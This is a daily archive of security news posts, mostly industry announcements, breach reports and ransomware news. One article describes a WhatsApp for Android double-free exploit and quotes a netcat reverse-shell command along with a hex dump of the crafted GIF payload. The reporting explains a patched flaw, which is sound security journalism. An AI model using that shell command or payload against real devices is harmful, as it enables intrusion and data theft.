Daily Archives: October 2, 2019

Good cybersecurity comes from focusing on the right things, but what are they?

“There is no wrong way into the security field and it’s never too late to make a career switch that will take you there,” says Mark Orlando, CTO at Raytheon Cyber Protection Solutions. If you think that’s easy for him to say, consider his education and employment twists and turns before getting into technology and, ultimately, into cybersecurity: he was an art and design student, then a Marine, and later an UPS truck loader. While … More

The post Good cybersecurity comes from focusing on the right things, but what are they? appeared first on Help Net Security.

US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply

US continues to warn its allies over China’s “predatory approach” especially for 5G technology, this time US Secretary of State alerts Italy.

US Secretary of State Mike Pompeo during the recent meeting with Italian Foreign Minister Luigi Di Maio warned Italy of China’s “predatory approach” to trade and investment.

Once again US is warning its allies over Chinese 5G technology, but the Italian Government explained that its special powers over 5G supply deals would mitigate any risk.

According to Pompeo, China and its technology pose a serious threat to the homeland security of the US and its allies.

“China has a predatory approach in trade and investment” and represents a “mutual threat” to the two countries” explained Pompeo during a joint press conference with Italy’s Foreign Minister Luigi Di Maio.

“When the Chinese Communist party shows up to make an investment to gain political power or threaten a nation’s security, that’s what needs to be protected against,”

Di Maio explained that the Italian Government opted to protect its infrastructure invoking the so-called “golden powers” in supply deals for fifth-generation (5G) telecom services. According to Di Maio, the golden powers over the supply deals on technology “make [Italy] among the most advanced in Europe on security”.

“We have no intention of taking part in trade accords that might harm our sovereignty as a state,” he added.

In September, Italy has exercised special powers in relation to the purchase of goods and services. The Italian government will impose conditions and technical specifications for the purchase of equipemnt and services for its 5G infrastructure.

In August, Romania announced it will ban Chinese giant Huawei from its 5G network, reads a joint statement signed by the Romanian and US presidents.

In April, British Government approved a limited role for Huawei in the building of a national 5G network in the country, ignoring security concerns from senior ministers. In December, a Czech cyber-security agency warned against using Huawei and ZTE technologies because they pose a threat to state security.

The Chinese giant was already excluded by several countries from building their 5G internet networks. The United StatesAustraliaNew Zealand, and Japan announced the exclusion of Huawei technology for their 5G internet networks.

Pierluigi Paganini

(SecurityAffairs – China, 5G)

The post US Secretary of State Mike Pompeo warns Italy over 5G Chinese equipment supply appeared first on Security Affairs.

How security programs and breach history influence company valuations

96% of cybersecurity professionals indicated that cybersecurity readiness factors into the calculation when they are assessing the overall monetary value of a potential acquisition target, a (ISC)2 survey reveals. (ISC)2 surveyed 250 U.S.-based professionals with mergers and acquisitions (M&A) expertise. Survey respondents unanimously agreed that cybersecurity audits are not only commonplace but are actually standard practice during M&A transaction preparation. The research also found that the results of such due diligence can have a tangible … More

The post How security programs and breach history influence company valuations appeared first on Help Net Security.

Executives have to make cybersecurity a priority in order to secure their business

Businesses and organizations of all sizes have steadily begun to recognize the importance of cybersecurity to their success. As spending and awareness of the importance of cybersecurity increases, so does the demand for intelligence about how best to spend those funds and what security leaders can expect in today’s constantly evolving attack surfaces. To help give business leaders insight into the threat landscape to better mitigate risk, Optiv Security has published its 2019 Cyber Threat … More

The post Executives have to make cybersecurity a priority in order to secure their business appeared first on Help Net Security.

Security and compliance gaps of ineffective employee onboarding and offboarding

There are significant gaps in the compliant management of employee resources throughout the employment lifecycle. Just 15% of employees have all the resources they require to be productive on day one, further, more than half (52%) of IT professionals know someone who still has access to a former employer’s applications and data, according to Ivanti. When it comes to employee onboarding, 38% of IT professionals report it takes between two and four days to get … More

The post Security and compliance gaps of ineffective employee onboarding and offboarding appeared first on Help Net Security.

Ping Identity launches PingCentral, a self-service solution for enterprise IAM

Ping Identity, a pioneer in Intelligent Identity, announced the release of PingCentral, a self-service delegated administration and converged operating portal for enterprise identity and access management (IAM). The solution addresses common tasks across the Ping Intelligent Identity™ platform with simple, self-service workflows and standardized templates that can be delegated to business users and application teams that don’t have IAM expertise. Dedicated IAM administrators often struggle to manage the high volume of requests required to keep … More

The post Ping Identity launches PingCentral, a self-service solution for enterprise IAM appeared first on Help Net Security.

Ixia unveils IxProbe, increasing quality of service and profitability for MNSPs

Keysight Technologies, a leading technology company that helps enterprises, service providers and governments accelerate innovation to connect and secure the world, announced IxProbe from Ixia, a Keysight Business. IxProbe is an inline monitoring solution that provides managed network service providers (MNSPs) with access to real-time monitoring of computing that resides at the edge of a customers’ network, typically a branch office, to increase quality of service (QoS) and profitability. MNSPs face significant challenges in meeting … More

The post Ixia unveils IxProbe, increasing quality of service and profitability for MNSPs appeared first on Help Net Security.

Best Practices for Using Tripwire Enterprise in Dynamic Environments – Part 2

In my previous article, we discussed how organizations are shifting how IT resources are deployed and managed. We covered three methods in particular: automated image creation and deployment, immutable image deployment and containers. We’ll now explore how organizations can make the best of these methods in a dynamic environment. Dealing with Change when the Targets […]… Read More

The post Best Practices for Using Tripwire Enterprise in Dynamic Environments – Part 2 appeared first on The State of Security.

LogRhythm launches True Unlimited Data Plan for SIEM

LogRhythm, the company powering the world’s enterprise security operations centers (SOCs), announced that it launched the first True Unlimited Data Plan for its NextGen SIEM. Historically, organizations have paid more as data ingestion increased. While others in the industry have previously claimed to support unlimited data plans, they have always come with a catch. LogRhythm is changing that in an effort to provide predictability for CISOs; therefore, combatting the risk of unprotected data. Big data … More

The post LogRhythm launches True Unlimited Data Plan for SIEM appeared first on Help Net Security.

FireEye’s election security public resource helps governments enforce free and fair elections

FireEye, the intelligence-led security company, announced a free new election security public resource to include the latest cyber security recommendations and informational materials to help governments enforce free and fair elections. Building on existing FireEye materials and programs, this resource will host free webinars, event information, threat intelligence and solutions in one easily accessible place to tackle the issue of election security from a technology perspective, as well as one of emergency management and response … More

The post FireEye’s election security public resource helps governments enforce free and fair elections appeared first on Help Net Security.

ComplianceAlpha 2.0: Strengthen and streamline a risk and compliance program

ACA Compliance Group (ACA), a leading provider of governance, risk, and compliance advisory services and technology solutions, launched ComplianceAlpha 2.0. This next-generation compliance and risk management platform helps financial services firms stay one step ahead of regulators’ increasingly advanced technological capabilities to detect insider trading, market abuse, and other potential misconduct. The enhanced platform was designed and developed by the industry’s largest team of former regulators, financial technologists, and cybersecurity professionals. ComplianceAlpha 2.0 responds to … More

The post ComplianceAlpha 2.0: Strengthen and streamline a risk and compliance program appeared first on Help Net Security.

DataVisor expands its family of fraud detection solutions with the Advanced Rules Engine

DataVisor, the leading fraud detection company with solutions powered by transformational AI technology, has expanded its family of fraud detection solutions with the Advanced Rules Engine that augments its product suites of sophisticated proactive measurements for organizations in their fight against fraud. DataVisor Rules Engine leverages the recently launched Feature Platform to engineer complex features for advanced rule creation. It delivers advanced rule management and rule performance optimization to enable teams to manage complex rules … More

The post DataVisor expands its family of fraud detection solutions with the Advanced Rules Engine appeared first on Help Net Security.

Continuum expands automation capabilities for its RMM solution

Continuum, the Platform for What’s Next, announced that it has expanded its automation capabilities for its remote monitoring and management (RMM) solution, Continuum Command. The automation enhancements, built with an intuitive user design and plug-and-play attributes, help MSPs get work done quicker and turn their focus to higher-value projects, driving growth and better service. Easy-to-use automation is particularly crucial in the current labor market, as the existing skills gap widens. MSPs – particularly in the … More

The post Continuum expands automation capabilities for its RMM solution appeared first on Help Net Security.

Cohesity’s unveils Cohesity SmartFiles, an intelligent NAS solution designed for web scale

Cohesity announced Cohesity SmartFiles, a software-defined solution for files and objects that goes beyond traditional scale-out NAS (network attached storage) capabilities. SmartFiles empowers organizations to utilize integrated applications to bring exceptional intelligence to file-related IT infrastructure. SmartFiles also reduces storage costs with unique capacity efficiency and multi-tier data management capabilities. Unlike competitive products, SmartFiles integrates multi-layer cybersecurity to defend valuable business data against cyber threats. SmartFiles is ideal for a variety of workloads including collaboration … More

The post Cohesity’s unveils Cohesity SmartFiles, an intelligent NAS solution designed for web scale appeared first on Help Net Security.

Elastic launches version 7.4 of the Elastic Stack

Elastic, the company behind Elasticsearch and the Elastic Stack, announced the general availability of version 7.4 of the Elastic Stack. Debuting in version 7.4 are several new features that simplify cluster administration and operations, introduce new aggregation and machine learning capabilities, and deepen the stack security experience. On the solutions front, Elastic SIEM improves security operations workflows by adding real-time maps for geospatial analytics, and 13 more predefined machine learning jobs for detecting a range … More

The post Elastic launches version 7.4 of the Elastic Stack appeared first on Help Net Security.

Resecurity experiences financial and geographical growth

Resecurity, a cybersecurity company that delivers in-depth analysis layered on top of the most comprehensive, exclusive sets of data from the Deep and Dark Web, announces the company has experienced significant growth both financially and geographically. Resecurity’s sales have grown 300 percent year over year, with customers and services now offered worldwide including in Europe, Middle East, North Africa, Asia and Latin America. “Fueling our growth is the need for mature, offensive threat intelligence is … More

The post Resecurity experiences financial and geographical growth appeared first on Help Net Security.

Smashing Security #148: Billboard boobs, face forensics, and Alexa gets way too personal

Drivers are distracted by a hacked billboard, we take a deeper look at how the deepfake problem has… uh… deepened, and Carole is less than happy about Amazon’s announcement about new Alexa integrations.

All this, an annoying goose, and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis.

ISACA expands its leadership team

Global technology association ISACA has added two roles on its leadership team that are the first of their kind at the organization— welcoming its first Chief Learning Officer, Nader Qaimari, as well as first Chief Technology Officer, Simona Rollinson. As CLO, Qaimari takes on ISACA’s learning and certification offerings for individual professionals, including the Certified Information Systems Auditor (CISA), Certified in Risk and Information Systems Control (CRISC), Certified Information Security Manager (CISM), Certified in the … More

The post ISACA expands its leadership team appeared first on Help Net Security.

Awake Security appoints Kevin Mandia to its board of directors

Awake Security, the only advanced network traffic analysis (NTA) company that delivers a privacy-aware solution, announced the appointment of Kevin Mandia, CEO of FireEye, to its board of directors. “Kevin has had a material impact in shaping the security industry by being in the trenches with security teams as they respond to incidents. Understanding how the attackers operate has helped him build teams of experts that have come to the aid of numerous organizations across … More

The post Awake Security appoints Kevin Mandia to its board of directors appeared first on Help Net Security.

Neustar adds new members to the Executive Committee

Neustar, a global information services company and leader in identity resolution, announced the appointment of Brian McCann as Executive Vice President and President of Security Solutions and Lee Kirschbaum as Senior Vice President of Communications Solutions and Corporate Business Development. Both will be members of the Executive Committee and report to Neustar President and CEO Charlie Gottdiener. “Neustar is fortunate to have attracted two accomplished industry veterans who share our acute focus on creating value … More

The post Neustar adds new members to the Executive Committee appeared first on Help Net Security.

Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations

Zendesk discloses a data breach that took place in 2016 when a hacker accessed data of 10,000 users, including passwords, emails, names, and phone numbers.

In 2016, customer service software company Zendesk suffered a security breach that exposed data of 10,000 users, including passwords, emails, names, and phone numbers. Zendesk software is currently used by more than one hundred of thousand organizations worldwide, including Uber, Shopify, Airbnb, and Slack.

Today the company published a security notice to disclose the incident.

“We recently were alerted by a third party regarding a security matter that may have affected the Zendesk Support and Chat products and customer accounts of those products activated prior to November of 2016.” reads the security notice. “While our investigation is still ongoing, on September 24, 2019, we determined that information belonging to a small percentage of customers was accessed prior to November of 2016.”

The company was informed by a third party regarding the security breach that might have impacted Zendesk Support and Chat accounts activated prior to November 1, 2016.

As of September 24, 2019 the company identified approximately 10,000 Zendesk Support and Chat accounts, including expired trial and accounts that are no longer active.

The customer service software firm decided to alert all the impacted users inviting them to take the following steps

  • If you installed a Zendesk Marketplace or private app prior to November 1, 2016 that saved authentication credentials such as API keys or passwords during installation, we recommend that you rotate all credentials for the respective app.
  • In addition, if you uploaded a TLS certificate to Zendesk prior to November 1, 2016 which is still valid, we recommend you upload a new certificate, and revoke the old one
  • While we have no indication at this time that other authentication credentials were accessed, customers may want to consider rotating authentication credentials used in Zendesk products prior to November 1, 2016. API Tokens in Chat do not need to be rotated.

The customer support ticketing platform discovered that the following customer information might have been accessed by the attacker:

  • Agent and end-user names that were hashed and salted
  • Contact information
  • Usernames and hashed and salted passwords
  • Transport Layer Security (TLS) encryption keys provided to Zendesk by customers
  • Configuration settings of apps installed from the Zendesk app marketplace or private apps   

The company announced that as a precautionary measure it will implement password rotations for all active agents in Support and Chat, and all end users in Support created prior to November 1, 2016. 

“Our security team is committed to determining the full extent of the data exposure and we will update you if we learn of any additional information that pertains to unauthorized access to your account so you can take appropriate proactive measures to protect your business,” concludes Zendesk.

Anyway, customers are invited to change their passwords.

This isn’t the first security breach suffered by Zendesk, the company was already breached in 2013.

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Zendesk 2016 security breach may impact Uber, Slack, and over 100k organizations appeared first on Security Affairs.

Vaughan partners with VentureLAB, York U, and Mackenzie Health to plan modern health precinct

As the City of Vaughan works towards the opening of the brand-new Mackenzie Vaughan Hospital in late 2020, it announced a partnership today with VentureLAB, York University, and Mackenzie Health to conduct a feasibility study and envision the plans for the Vaughan Healthcare Centre Precinct. The proposed complex is planned to be built on the…

Expert disclosed details of remote code execution flaw in Whatsapp for Android

Researcher discovered a double-free vulnerability in WhatsApp for Android that could be exploited by remote attackers to execute arbitrary code on the vulnerable device.

A security researcher that goes online with the moniker Awakened discovered a double-free vulnerability in WhatsApp for Android and demonstrated how to leverage on it to remotely execute arbitrary code on the target device.

The expert reported the issue to Facebook that acknowledged and addressed the flaw with the release of WhatsApp version 2.19.244.

The expert discovered that the flaw resides in the DDGifSlurp in decoding.c in libpl_droidsonroids_gif .so library used to generate the preview of the GIF file when a user opens Gallery view in the popular messaging application to send a media file,

“When the WhatsApp Gallery is opened, the said GIF file triggers the double-free bug on rasterBits buffer with size sizeof(GifInfo). Interestingly, in WhatsApp Gallery, a GIF file is parsed twice. When the said GIF file is parsed again, another GifInfo object is created.” reads a technical analysis published by the expert. “Because of the double-free behavior in Android, GifInfo info object and info->rasterBits will point to the same address. DDGifSlurp() will then decode the first frame to info->rasterBits buffer, thus overwriting info and its rewindFunction(), which is called right at the end of DDGifSlurp() function.”

The expert was able to craft a GIF file to control the PC register, then he successfully achieved remote code execution by executing the following command:

system("toybox nc 192.168.2.72 4444 | sh");

The expert highlighted that it was not possible to point to system() function in libc.so, instead, it was necessary to first let PC jumps to an intermediate gadget.

we need an information disclosure vulnerability that gives us the base address of libc.so and libhwui.so. That vulnerability is not in the scope of this blogpost.” continues the expert. ” Note that the address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.”

The expert developed the code that was able to generate a corrupted GIF file that could exploit the vulnerability.

notroot@osboxes:~/Desktop/gif$ gcc -o exploit egif_lib.c exploit.c
.....
.....
.....
notroot@osboxes:~/Desktop/gif$ ./exploit
buffer = 0x7ffc586cd8b0 size = 266
47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
18 00 0A 00 0F 00 01 00 00 3B

Then he copied the content into a GIF file and send it as Document with WhatsApp to another WhatsApp user. The researcher explained that the crafted GIF file could not be sent as a Media file, because WhatsApp attempts to convert it into an MP4 before to send it. The vulnerability will be triggered when the target user that has received the malicous GIF file will open WhatsApp Gallery to send a media file to his friend.

Below the attack vectors devised by the expert:

  1. Local privilege escaltion (from a user app to WhatsApp): A malicious app is installed on the Android device. The app collects addresses of zygote libraries and generates a malicious GIF file that results in code execution in WhatsApp context. This allows the malware app to steal files in WhatsApp sandbox including message database.
  2. Remote code execution: Pairing with an application that has an remote memory information disclosure vulnerability (e.g. browser), the attacker can collect the addresses of zygote libraries and craft a malicious GIF file to send it to the user via WhatsApp (must be as an attachment, not as an image through Gallery Picker). When the user opens the Gallery view in WhatsApp, the GIF file will trigger a remote shell in WhatsApp context.

The exploit works for WhatsApp version 2.19.230 and prior versions, the company addressed it with the release of the version 2.19.244

The exploit works for Android 8.1 and 9.0, but the expert explained that it does not work for Android 8.0 and below.

“In the older Android versions, double-free could still be triggered. However, because of the calls by the system after the double-free, the app just crashes before reaching to the point that we could control the PC register.” concludes the expert.

Pierluigi Paganini

(SecurityAffairs – WhatsApp, hacking)

The post Expert disclosed details of remote code execution flaw in Whatsapp for Android appeared first on Security Affairs.

Prepare to Attack in Autumn

We still love feedback! Our quarterly event series launched last December with hundreds of participants and dozens of great suggestions. Since then we’ve had two more quarterly events, hosted dozens of OWASP, ISSA, and conference Cyber Ranges, and received inboxes full of overwhelmingly positive suggestions. This feedback has allowed our team to provide even more to the AppSec community:

Microsoft Surface Pro X uses a custom Qualcomm-made SQ1 processor

The last time Microsoft put an ARM processor in a Surface was in 2012 when the series first launched. Powered by an Nvidia Tegra chip, the Surface RT (Run Time) was ill-received due to the lack of native apps and the ultra-restrictive Windows 8 RT operating system. But ARM has resurfaced in the Surface Pro…

The Reinvention of HR: Managing HCM Trends and the Evolving Workforce

Preparing today for tomorrow’s increasingly diverse workforce This is the first time in history that there are five generations at work together, and the business implications of such a diverse workforce working side by side cannot be overestimated. Recently, 60 percent of CEOs surveyed by PricewaterhouseCoopers indicated that the multigenerational workforce will in fact “transform”…

Hackers Are Impersonating Each Other to Hide Their Real Agendas

Hackers Are Impersonating Each Other to Hide Their Real Agendas

Threat actors have been using cyber-disguises to keep their true intentions secret, according to a report published today by Optiv Security.

Typical cyber threat intelligence usually categorizes threat actors in fixed classes, such as nation-states, cyber-criminals, commercial entities, and hacktivists. But, according to Optiv’s new 2019 Cyber Threat Intelligence Estimate (CTIE) report, "it’s a mistake to assume these categories are rigid or to assume that a threat actor’s classification is static."

The CTIE report is inspired by national intelligence estimates, which are analytic reports produced by the intelligence community of the United States for consumption by Congress. The CTIE comprises contributions from Optiv’s Global Threat Intelligence Center (gTIC), cyber threat intelligence company IntSights, and Carbon Black, a leader in cloud endpoint protection.

Optiv researchers found that it's not unusual for threat actors to have multiple criminal identities that they can switch between to get what they want without revealing who they are or what their actual agenda is.

For example, nation-state actors may pretend to be just a regular cyber-criminal targeting a company’s customer database, when in reality their target is to delve into the firm's deepest recesses to steal its intellectual property. 

According to the report: "Sometimes threat actors may masquerade as a certain type in order to hide their true agenda. Or, threat actors may belong to two or more classes, switching between them as their priorities change."

Threat actors who demonstrate this switching behavior to cloak the true nature of their dastardly deeds are described by Optiv's researchers as "hybrid threat actors." According to the report, their primary targets are governments, manufacturing, energy, and utilities. 

According to Optiv CISO Brian Wrozek, spotting when an impersonation is taking place is "quite difficult." He told Infosecurity Magazine: "Imagine robbing a bank, but the bank robber is able to present themselves as a police officer. It would be extremely difficult to identify that person. Security professionals look for patterns, which can create opportunities for bad actors to abuse those patterns to obscure their true identities."

Asked which class of threat actor is the easiest to impersonate, Wrozek said: "It’s difficult to say which is easiest, but one of the most common places we see this is in regard to nation-states. With so much politically driven activity regarding cybersecurity happening across the globe, it can be easy for nation-states to play the blame game with one another, making attribution difficult. Also, no one likes to admit they got hacked by some random individual. Saying a rich, powerful nation-state was behind an attack is much less embarrassing, so there’s that aspect to consider as well."

Other findings of the report are that crypto-jacking and ransomware attacks are increasing in popularity, and that retail, healthcare, government, and financial institutions continue to be among the most targeted verticals of cybersecurity attacks or attempts among the 10 categories of Optiv clients.

"Cyberspace has become more hostile. Hackers are more organized and sophisticated in 2019, and we’re seeing malicious attackers increase their counter measures to avoid detection,” said Tom Kellermann, chief cybersecurity officer at Carbon Black. 

"According to our research, no vertical is immune, but the financial industry continues to stand out as a key target for advanced attacks. We hope cybersecurity leaders and teams will use this data as a clarion call to improve their cybersecurity postures."

10 Hospitals Held to Ransom by Cyber-Criminals

10 Hospitals Held to Ransom by Cyber-Criminals

Ten hospitals in Australia and the United States have been hit by ransomware attacks since Monday. 

In America, computers at three Alabama hospitals operated by DCH Health System were affected, causing staff to close their doors to any new patients who weren't critically ill. 

In a statement posted on their website earlier today, DCH wrote: "Early Oct 1, the DCH Heath System discovered that it had suffered a ransomware attack that impacted their systems. We immediately implemented emergency procedures to continue providing safe and patient-centered care."

The hospitals affected by the attack are DCH Regional Medical Center in Tuscaloosa, Fayette Medical Center and Northport Medical Center. While access to computer systems remains limited, local ambulances are taking patients to other healthcare providers located nearby. 

Surgeries scheduled for tomorrow will go ahead however outpatients with appointments at any of the three hospitals affected by the ransomware attack are advising to call to confirm before attending. 

Services at seven hospitals and healthcare facilities in Australia have likewise been boggled by ransomware in a separate cyber-attack which struck in Gippsland and south-west Victoria on Monday. 

The impacted hospitals are part of the South West Alliance of Rural Health and also of Gippsland Health Alliance. Multiple computer systems have been disconnected to while the Victorian Cyber Incident Response Service works to resolve the situation. 

Barwon Health, which operates hospitals affected by the attack, said that some elective surgeries and appointments had been cancelled. 

The Victorian government's Department of Premier and Cabinet said: "A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact. 

"At this time, there is no suggestion that personal patient information has been accessed."

Commenting on the ransomware attacks, senior director of managed threat response at Sophos, J.J. Thompson, said: "Ransomware is foreseeable and preventable. Organizations need to have effective, advanced protection in place at every state of an attack. The techniques, tactics and procedures that occur prior to a ransomware incident can and should be detected by existing security capabilities and are foundational pillars to the patient care model in healthcare 4.0.

"It’s also important to have off-site backups to reduce the pressure to comply with expensive ransom demands and to be able to recover faster."

MITRE ATT&CK™ APT3 Assessment

Making a case for the importance for real-time reporting is a simple exercise when considering almost every major campaign.  Take the case of Shamoon, where analysis into the Disttrack wiper revealed a date in the future when destruction would happen.  Similarly, cases where actors use different techniques in their attacks reveal that once mapped out, a story becomes visible. The question is, do you have visibility and early warnings into these threats and how timely are they presented to you so there’s time to respond? 

MITRE’s ATT&CK for Enterpriseproduced by the Cyber Security division of MITRE, is an adversarial behavior model for possible attacker actionsThe ATT&CK matrix used is a visualization tool in the form of a large table, intended to help provide a framework to talk about attacks in a unified way. This is coupled to detailed descriptions of different tactics and techniques and how they differ from attacker to attacker.  

When you participate in the assessment, MITRE is the red team simulating the techniques, used by APT3 in this case, and we as McAfee are the blue team using our products to detect their actions and report them. When the red team attacks us with a variant of a technique, as a blue team, we need to prove we detected it. 

McAfee went through a MITRE ATT&CK assessment early this summer and we are excited to announce that MITRE has published the results of the APT3 assessment today on their website. In today’s cyber-threat landscape, it’s all about ‘time’, time to detect, time to respond, time to remediate, etc. When it comes to advanced attacks represented in APT3 – real time detections offer a significant advantage to incident responders to rapidly contain threats. 

As the results show, McAfee provided the most real-time alerts while detecting the attacksWhen real-time alerts and simple efficacy score, as calculated using criteria published by Josh Zelonis of Forrester, are considered together, McAfee occupies a leadership position in the upper right quadrant of the chart: 

 

 

During MITRE’s APT3 evaluation, McAfee was the only vendor to display real-time alerts for certain attacks, including T1088: Bypass User Account Control, one of the techniques used by Shamoon. 

While MITRE’s evaluation focused on MVISION EDR’s detection capabilities, there are several aspects that defenders need to consider in order to properly triage, scope, contain and close an incidentDuring the APT3 attack we generated 200+ alerts and telemetry datapoints which were the core of MITRE’s evaluationYet we don’t expect analysts to review them individually. In MVISION EDR those 200+ data points got clustered into 14 threats which added context to paint a more complete picture of what happened in order to speed triage. 

Furthermore, analysts could trigger an automated investigation from a threat and therefore involve our AI driven investigation guides to bring more context from other products (e.g. ePO, SIEM)endpoint forensics, analytics and threat intelligence.  

 

Investigation case collecting 4000+ pieces of evidence, linking it, showing expert findings and uncovering potential lateral movement between two devices 

 Thanks to our automated investigation guides, in the case of APT3MVISION EDR was able to gather passive DNS information and link the evidence to further expose potential lateral movement and C2. 

Although it was not exercised by MITRE, the next step for the analyst would have been to use MVISION EDR’s real time search to further scope the affected devices and take containment actions (e.g. quarantine, kill processes, etc). 

McAfee has been engaged with MITRE in expanding the ATT&CK Matrix and helping to evolve future ATT&CK Evaluations. We are a proud sponsor of ATT&CKcon and will be exhibiting at ATT&CKcon 2.0 later this month. Come learn more about how automated AI-driven investigations can reduce the time to detect and respond to threats using McAfee MVISION EDR. 

 

 

The post MITRE ATT&CK™ APT3 Assessment appeared first on McAfee Blogs.

America Launches New Cybersecurity Directorate

America Launches New Cybersecurity Directorate

America's National Security Agency has launched a new organization to beef up the country's defenses against cyber-attackers. 

The Cybersecurity Directorate has been created to unify the efforts of the NSA's existing foreign intelligence and cyber-defense missions. The new organization will bring the Agency's threat detection, future-technologies, and cyber-defense personnel together under one roof for the very first time.

Underpinning the creation of the directorate is the idea that forming partnerships to allow intelligence and technical expertise to be pooled and operationalized represents America's best chance of thwarting cyber-adversaries. 

A spokesperson for the NSA said: "Many organizations work tirelessly to protect against today’s threats and tomorrow's risks, but the adversaries are tenacious, and they only need to be successful once.

"The Cybersecurity Directorate will reinvigorate NSA’s white hat mission by sharing critical threat information and collaborating with partners and customers to better equip them to defend against malicious cyber activity.

"The new directorate will also better position NSA to operationalize its threat intelligence, vulnerability assessments, and cyber-defense expertise by integrating these efforts to deliver prioritized outcomes." 

One of the NSA's partners is the Department of Homeland Security, with whom the Agency has been working to identify and monitor the systems in the financial sector that make the easiest hacking targets.

By launching the new directorate, the NSA hopes to strengthen the cyber-shield protecting the country's national security systems and critical infrastructure from threat actors. 

Topping the freshly launched organization's list of priorities are defending America's industrial base and innovating ways to improve the security of the nation's extensive arsenal of weapons. 

Helping to safeguard the private sector is also something that the new directorate will focus on. Efforts will be made to declassify threat intelligence received by the new organization as speedily as possible so that it can be shared with US businesses. 

NSA director General Paul Nakasone said: "What I’m trying to get to in a space like cyberspace is speed, agility, and unity of effort."

Leading the new Cybersecurity Directorate is director of cybersecurity Anne Neuberger, who reports directly to General Nakasone. Her previous positions include NSA’s first chief risk officer, deputy director of operations, and lead of NSA’s Russia Small Group. 

McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – The All-Stars

Episode 2: The All-Stars

Analyzing Affiliate Structures in Ransomware-as-a-Service Campaigns

This is the second installment of the McAfee Advanced Threat Research (ATR) analysis of Sodinokibi and its connections to GandGrab, the most prolific Ransomware-as-a-Service (RaaS) Campaign of 2018 and mid-2019.

GandCrab announced its retirement at the end of May. Since then, a new RaaS family called Sodinokibi, aka REvil, took its place as one of the most prolific ransomware campaigns.

In episode one of our analysis on the Sodinokibi RaaS campaign we shared our extensive malware and post-infection analysis, which included code comparisons to GandCrab, and insight on exactly how massive the new Sodinokibi campaign is.

The Sodinokibi campaigns are still ongoing and differ in execution due to the different affiliates spreading the ransomware. Which begs more questions to be answered, such as how do the affiliates operate? Is the affiliate model working? What can we learn about the campaign and possible connections to GandCrab by investigating the affiliates?

It turns out, through large scale sample analysis and hardcoded value aggregation, we were able to determine which affiliates played a crucial role in the success of GandCrab’ criminal enterprise and found a lot of similarity between the RaaS enterprise of GandCrab and that of Sodinokibi.

Before we begin with the Sodinokibi analysis and comparison we will briefly explain the methodology that we used for GandCrab.

GandCrab RaaS System

GandCrab was a prime example of a Ransomware-as-a-Service. RaaS follows a structure where the developers are offering their product to affiliates, partners or advertisers who are responsible for spreading the ransomware and generating infections. The developers take a percentage of the earned income and provide the other portion to the affiliates.

FIGURE 1. HIGH LEVEL OVERVIEW OF THE GANDCRAB RAAS MODEL

Operating a RaaS model can be lucrative for both parties involved:

  • Developer’s perspective: The malware author/s request a percentage per payment for use of the ransomware product. This way the developers have less risk than the affiliates spreading the malware. The developers can set certain targets for their affiliates regarding the amount of infections they need to produce. In a way, this is very similar to a modern sales organization in the corporate world.

Subsequently, a RaaS model offers malware authors a safe haven when they operate from a country that does not regard developing malware as a crime. If their own nation’s citizens are not victimized, the developers are not going to be prosecuted.

  • Affiliate perspective: As an affiliate you do not have to write the ransomware code yourself; less technical skill is involved. RaaS makes ransomware more accessible to a greater number of users. An affiliate just needs to be accepted in the criminal network and reach the targets set by the developers. As a service model it also offers a level of decentralization where each party sticks to their own area of expertise.

Getting a Piece of the Pie

Affiliates want to get paid proportionate to the infections they made; they expose themselves to a large amount of risk by spreading ransomware and they want to reap the benefits. Mutual trust between the developer and the affiliate plays a huge role in joining a RaaS system. It is very much like the expression: “Trust, hard to build, and easy to lose” and this largely explains the general skepticism that cybercriminal forum members display when a new RaaS system is announced.

For the RaaS service to grow and maintain their trust, proper administration of infections/earnings per affiliate plays an important part. Through this, the developers can ensure that everyone gets an honest piece of the proverbial “pie”. So how can this administration be achieved? One way is having hardcoded values in the ransomware.

Linking the Ransomware to Affiliates

Through our technical malware analysis, we established that, starting from version 4, GandCrab included certain hardcoded values in the ransomware source code:

  • id – The affiliate id number.
  • sub_id – The Sub ID of the affiliate ID; A tracking number for the affiliate for sub-renting infections or it tracks their own campaign, identifiable via the sub_id number.
  • version – The internal version number of the malware.

Version 4 had significant changes overall and we believe that these changes were partly done by the authors to improve administration and make GandCrab more scalable to cope with its increased popularity.

Based on the hardcoded values it was possible for us, to a certain extent, to extract the administration information and create our own overview. We hunted for as many different GandCrab samples as we could find, using Yara rules, industry contacts and customer submissions. The sample list we gathered is quite extensive but not exhaustive. From the collected samples we extracted the hardcoded values and compile times automatically, using a custom build tool. We aggregated all these values together in one giant timeline from GandCrab version 4, all the way up to version 5.2.

FIGURE 2. SMALL PORTION OF THE TIMELINE OF COLLECTED SAMPLES (NOTE THE FIRST FOUR POSSIBLY TIME STOMPED)

ID and SUB_ID Characteristics Observed

Parent-Child Relationship
The extracted ID’s and Sub_IDs showed a parent-child relationship, meaning every ID could have more than one SUB_ID (child) but every SUB_ID only had one ID (parent).

FIGURE 3. THE ACTIVITY OF ID NUMBER 41 (PARENT) AND ITS CORRESPONDING SUB_IDs (CHILDREN)

